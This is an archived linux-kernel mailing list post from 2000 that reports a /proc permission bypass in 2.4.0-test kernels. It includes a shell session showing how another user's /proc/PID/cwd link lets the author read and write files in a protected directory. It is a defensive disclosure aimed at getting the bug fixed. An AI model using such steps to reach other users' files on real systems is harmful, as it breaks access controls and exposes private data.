2.4.(0-test10): /proc security hole

From: Lutz Pressler (lp@SerNet.DE)
Date: Sun Nov 05 2000 - 08:02:14 EST


Hello,

I do not think that the following behaviour (2.4.0-test10 on i386, also
tested with 2.4.0-test8) is intended:

testuser@vax:~ > id
uid=503(testuser) gid=100(users) Gruppen=100(users)
testuser@vax:~ > ls -lad .
drwx------ 7 testuser users 4096 Nov 5 13:38 .

testuser@vax:~ > cd dir
testuser@vax:~/dir > ls -la
insgesamt 16
drwxr-xr-x 3 testuser users 4096 Nov 5 13:39 .
drwx------ 7 testuser users 4096 Nov 5 13:38 ..
-rw-r--r-- 1 testuser users 7 Nov 5 13:39 file
drwxrwxr-x 2 testuser users 4096 Nov 5 13:39 subdir

Myself (lpressl, uid=500) cannot change into /home/testuser/dir,
as expected:
lpressl@vax:~ > cd ~testuser/dir
bash: cd: /home/testuser/dir: Permission denied

BUT: let testuser be logged in and have a process (bash) with cwd
/home/testuser/dir. Then
lpressl@vax:~ > ps uax |grep testuser
yields
...
testuser 588 0.0 2.1 2256 1360 tty2 S 13:38 0:00 -bash
...

lpressl@vax:~ > cd /proc/588
lpressl@vax:/proc/588 > ls -la
total 0
dr-xr-xr-x 3 testuser users 0 Nov 5 13:49 .
dr-xr-xr-x 59 root root 0 Nov 5 13:34 ..
-r--r--r-- 1 testuser users 0 Nov 5 13:49 cmdline
lrwxrwxrwx 1 testuser users 0 Nov 5 13:49 cwd -> /home/testuser/dir
-r-------- 1 testuser users 0 Nov 5 13:49 environ
lrwxrwxrwx 1 testuser users 0 Nov 5 13:49 exe -> /bin/bash
dr-x------ 2 testuser users 0 Nov 5 13:49 fd
-r--r--r-- 1 testuser users 0 Nov 5 13:49 maps
-rw------- 1 testuser users 0 Nov 5 13:49 mem
lrwxrwxrwx 1 testuser users 0 Nov 5 13:49 root -> /
-r--r--r-- 1 testuser users 0 Nov 5 13:49 stat
-r--r--r-- 1 testuser users 0 Nov 5 13:49 statm
-r--r--r-- 1 testuser users 0 Nov 5 13:49 status

cd cwd shouldn't be possible, should it? But let's see:
lpressl@vax:/proc/588 > cd cwd
lpressl@vax:/proc/588/cwd >

Oops....

lpressl@vax:/proc/588/cwd > ls -la
total 16
drwxr-xr-x 3 testuser users 4096 Nov 5 13:39 .
drwx------ 7 testuser users 4096 Nov 5 13:38 ..
-rw-r--r-- 1 testuser users 7 Nov 5 13:39 file
drwxrwxr-x 2 testuser users 4096 Nov 5 13:39 subdir

lpressl@vax:/proc/588/cwd > cat file
secret
lpressl@vax:/proc/588/cwd > cd subdir
lpressl@vax:/proc/588/cwd/subdir >
lpressl@vax:/proc/588/cwd/subdir > echo ohoh > newfile
lpressl@vax:/proc/588/cwd/subdir > ls -la
total 12
drwxrwxr-x 2 testuser users 4096 Nov 5 13:53 .
drwxr-xr-x 3 testuser users 4096 Nov 5 13:39 ..
-rw-r--r-- 1 lpressl users 5 Nov 5 13:53 newfile

This is bad. 2.2 kernels don't show this behavior. There _any_
/proc/PID/cwd "directory" has no group or world permissions
at all.

I haven't looked at the code at all yet. Anybody with a fix?

Regards,
  Lutz
  

-- 
  _              |  Lutz Pressler          |  Tel: ++49-551-3700002
 |_     |\ |     |  Service Network GmbH   |  FAX: ++49-551-3700009
 ._|ER  | \|ET   |  Bahnhofsallee 1b       |   mailto:lp@SerNet.DE
Service Network  |  D-37081 Goettingen     |  http://www.SerNet.DE/
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
Please read the FAQ at http://www.tux.org/lkml/



This archive was generated by hypermail 2b29 : Tue Nov 07 2000 - 21:00:17 EST